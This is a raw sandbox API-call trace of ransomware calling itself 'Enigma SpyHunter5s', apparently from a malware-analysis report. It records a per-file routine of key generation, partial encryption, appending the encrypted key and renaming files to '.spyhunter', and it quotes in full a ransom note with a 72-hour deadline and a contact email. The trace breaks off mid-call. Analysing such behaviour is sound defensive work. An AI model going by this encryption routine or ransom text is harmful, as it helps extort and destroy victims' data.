[0148.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.572] GetProcessHeap () returned 0x2c0000 [0148.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46928 | out: hHeap=0x2c0000) returned 1 [0148.572] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef40 | out: pbBuffer=0x248ef40) returned 1 [0148.572] GetProcessHeap () returned 0x2c0000 [0148.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.572] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef38*=0x30) returned 1 [0148.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\EdvHCI593LT4Bk2XWS.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\edvhci593lt4bk2xws.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0148.573] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\EdvHCI593LT4Bk2XWS.ots") returned 87 [0148.573] StrStrW (lpFirst="EdvHCI593LT4Bk2XWS.ots", lpSrch=".txt") returned 0x0 [0148.573] GetProcessHeap () returned 0x2c0000 [0148.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.573] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eefc*=0x2800, lpOverlapped=0x0) returned 1 [0148.574] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.574] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eefc*=0x2800, lpOverlapped=0x0) returned 1 [0149.116] GetProcessHeap () returned 0x2c0000 [0149.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.116] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.116] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x248ef3c*, lpNumberOfBytesWritten=0x248eefc*=0x4, lpOverlapped=0x0) returned 1 [0149.116] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eefc*=0x30, lpOverlapped=0x0) returned 1 [0149.116] CloseHandle (hObject=0x9c) returned 1 [0149.116] GetProcessHeap () returned 0x2c0000 [0149.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.117] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\EdvHCI593LT4Bk2XWS.ots.spyhunter") returned 97 [0149.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\EdvHCI593LT4Bk2XWS.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\edvhci593lt4bk2xws.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H7JtTIBNSFLZqk55slr8\\EdvHCI593LT4Bk2XWS.ots.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h7jttibnsflzqk55slr8\\edvhci593lt4bk2xws.ots.spyhunter")) returned 1 [0149.118] GetProcessHeap () returned 0x2c0000 [0149.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.118] GetProcessHeap () returned 0x2c0000 [0149.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.118] GetProcessHeap () returned 0x2c0000 [0149.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39fb8 | out: hHeap=0x2c0000) returned 1 [0149.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef38 | out: pbBuffer=0x248ef38) returned 1 [0149.118] GetProcessHeap () returned 0x2c0000 [0149.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef30*=0x30) returned 1 [0149.118] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5CGp17lQBa5C.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5cgp17lqba5c.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.119] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5CGp17lQBa5C.pptx") returned 61 [0149.119] StrStrW (lpFirst="5CGp17lQBa5C.pptx", lpSrch=".txt") returned 0x0 [0149.119] GetProcessHeap () returned 0x2c0000 [0149.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.119] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eef4*=0x6ad, lpOverlapped=0x0) returned 1 [0149.120] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffff953, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.120] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x6ad, lpNumberOfBytesWritten=0x248eef4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eef4*=0x6ad, lpOverlapped=0x0) returned 1 [0149.120] GetProcessHeap () returned 0x2c0000 [0149.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.120] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.120] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eef4, lpOverlapped=0x0 | out: lpBuffer=0x248ef34*, lpNumberOfBytesWritten=0x248eef4*=0x4, lpOverlapped=0x0) returned 1 [0149.120] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eef4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eef4*=0x30, lpOverlapped=0x0) returned 1 [0149.120] CloseHandle (hObject=0x9c) returned 1 [0149.121] GetProcessHeap () returned 0x2c0000 [0149.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.121] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5CGp17lQBa5C.pptx.spyhunter") returned 71 [0149.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5CGp17lQBa5C.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5cgp17lqba5c.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5CGp17lQBa5C.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5cgp17lqba5c.pptx.spyhunter")) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85c58 | out: hHeap=0x2c0000) returned 1 [0149.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef38 | out: pbBuffer=0x248ef38) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef30*=0x30) returned 1 [0149.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e110 | out: hHeap=0x2c0000) returned 1 [0149.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef30 | out: pbBuffer=0x248ef30) returned 1 [0149.122] GetProcessHeap () returned 0x2c0000 [0149.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.123] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef28*=0x30) returned 1 [0149.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.123] GetProcessHeap () returned 0x2c0000 [0149.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.123] GetProcessHeap () returned 0x2c0000 [0149.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e068 | out: hHeap=0x2c0000) returned 1 [0149.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.124] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.124] WriteFile (in: hFile=0x9c, lpBuffer=0x248ee63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x248ee63*, lpNumberOfBytesWritten=0x248ef8c*=0x127, lpOverlapped=0x0) returned 1 [0149.125] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.125] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef8c*=0x2ac, lpOverlapped=0x0) returned 1 [0149.137] CloseHandle (hObject=0x9c) returned 1 [0149.137] GetProcessHeap () returned 0x2c0000 [0149.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d578 | out: hHeap=0x2c0000) returned 1 [0149.137] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef28 | out: pbBuffer=0x248ef28) returned 1 [0149.137] GetProcessHeap () returned 0x2c0000 [0149.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.137] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef20*=0x30) returned 1 [0149.137] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_Ltn3lESNc.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ltn3lesnc.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_Ltn3lESNc.rtf") returned 56 [0149.138] StrStrW (lpFirst="_Ltn3lESNc.rtf", lpSrch=".txt") returned 0x0 [0149.138] GetProcessHeap () returned 0x2c0000 [0149.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.138] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eee4*=0x2800, lpOverlapped=0x0) returned 1 [0149.139] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.139] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eee4*=0x2800, lpOverlapped=0x0) returned 1 [0149.139] GetProcessHeap () returned 0x2c0000 [0149.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.139] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.139] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x248ef24*, lpNumberOfBytesWritten=0x248eee4*=0x4, lpOverlapped=0x0) returned 1 [0149.140] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eee4*=0x30, lpOverlapped=0x0) returned 1 [0149.140] CloseHandle (hObject=0x9c) returned 1 [0149.140] GetProcessHeap () returned 0x2c0000 [0149.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.140] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_Ltn3lESNc.rtf.spyhunter") returned 66 [0149.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_Ltn3lESNc.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ltn3lesnc.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_Ltn3lESNc.rtf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_ltn3lesnc.rtf.spyhunter")) returned 1 [0149.141] GetProcessHeap () returned 0x2c0000 [0149.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.142] GetProcessHeap () returned 0x2c0000 [0149.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.142] GetProcessHeap () returned 0x2c0000 [0149.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d4b8 | out: hHeap=0x2c0000) returned 1 [0149.142] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef28 | out: pbBuffer=0x248ef28) returned 1 [0149.142] GetProcessHeap () returned 0x2c0000 [0149.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.142] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef20*=0x30) returned 1 [0149.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZFg2gHM1n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zfg2ghm1n.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZFg2gHM1n.mkv") returned 55 [0149.142] StrStrW (lpFirst="ZFg2gHM1n.mkv", lpSrch=".txt") returned 0x0 [0149.142] GetProcessHeap () returned 0x2c0000 [0149.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.142] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eee4*=0x2800, lpOverlapped=0x0) returned 1 [0149.143] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.143] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eee4*=0x2800, lpOverlapped=0x0) returned 1 [0149.143] GetProcessHeap () returned 0x2c0000 [0149.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.144] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.144] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x248ef24*, lpNumberOfBytesWritten=0x248eee4*=0x4, lpOverlapped=0x0) returned 1 [0149.144] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eee4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eee4*=0x30, lpOverlapped=0x0) returned 1 [0149.144] CloseHandle (hObject=0x9c) returned 1 [0149.144] GetProcessHeap () returned 0x2c0000 [0149.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.144] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZFg2gHM1n.mkv.spyhunter") returned 65 [0149.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZFg2gHM1n.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zfg2ghm1n.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZFg2gHM1n.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zfg2ghm1n.mkv.spyhunter")) returned 1 [0149.145] GetProcessHeap () returned 0x2c0000 [0149.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.146] GetProcessHeap () returned 0x2c0000 [0149.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.146] GetProcessHeap () returned 0x2c0000 [0149.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec24a8 | out: hHeap=0x2c0000) returned 1 [0149.146] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ef20 | out: pbBuffer=0x248ef20) returned 1 [0149.146] GetProcessHeap () returned 0x2c0000 [0149.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.146] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ef18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ef18*=0x30) returned 1 [0149.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y9YQB5qOqp.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y9yqb5qoqp.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0149.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y9YQB5qOqp.odp") returned 56 [0149.146] StrStrW (lpFirst="Y9YQB5qOqp.odp", lpSrch=".txt") returned 0x0 [0149.146] GetProcessHeap () returned 0x2c0000 [0149.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.147] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eedc*=0x2800, lpOverlapped=0x0) returned 1 [0149.147] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.157] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eedc*=0x2800, lpOverlapped=0x0) returned 1 [0149.157] GetProcessHeap () returned 0x2c0000 [0149.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.157] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.157] WriteFile (in: hFile=0x9c, lpBuffer=0x248ef1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x248ef1c*, lpNumberOfBytesWritten=0x248eedc*=0x4, lpOverlapped=0x0) returned 1 [0149.157] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eedc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eedc*=0x30, lpOverlapped=0x0) returned 1 [0149.157] CloseHandle (hObject=0x9c) returned 1 [0149.158] GetProcessHeap () returned 0x2c0000 [0149.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.158] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y9YQB5qOqp.odp.spyhunter") returned 66 [0149.158] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y9YQB5qOqp.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y9yqb5qoqp.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y9YQB5qOqp.odp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\y9yqb5qoqp.odp.spyhunter")) returned 1 [0149.159] GetProcessHeap () returned 0x2c0000 [0149.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.159] GetProcessHeap () returned 0x2c0000 [0149.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.159] GetProcessHeap () returned 0x2c0000 [0149.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 